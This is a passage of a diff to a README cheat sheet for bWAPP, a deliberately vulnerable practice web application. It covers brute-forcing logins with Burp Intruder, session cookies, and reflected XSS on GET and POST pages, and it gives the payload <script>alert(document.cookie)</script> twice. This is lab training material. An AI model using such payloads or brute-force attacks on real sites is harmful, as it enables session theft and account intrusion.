tauseedzaman/bWAPP-cheetsheet/README.md

 hacked using brup intruder and commen list of username/passwords

 ```
+### Session Mgmt. - Strong Sessions
+show different cookies change security level and visite given link to see the movies :0

 # A3 - Cross-Site Scripting (XSS)

 ### 💀  XSS - Reflected (GET) 💀

 xss_get.php
+you can insert html as well as js in the given fields
 ```
 <script>alert(document.cookie)</script>
 ```

 ### 💀  XSS - Reflected (POST) 💀
 xss_post.php

+the same but with POST request

 ```
 <script>alert(document.cookie)</script>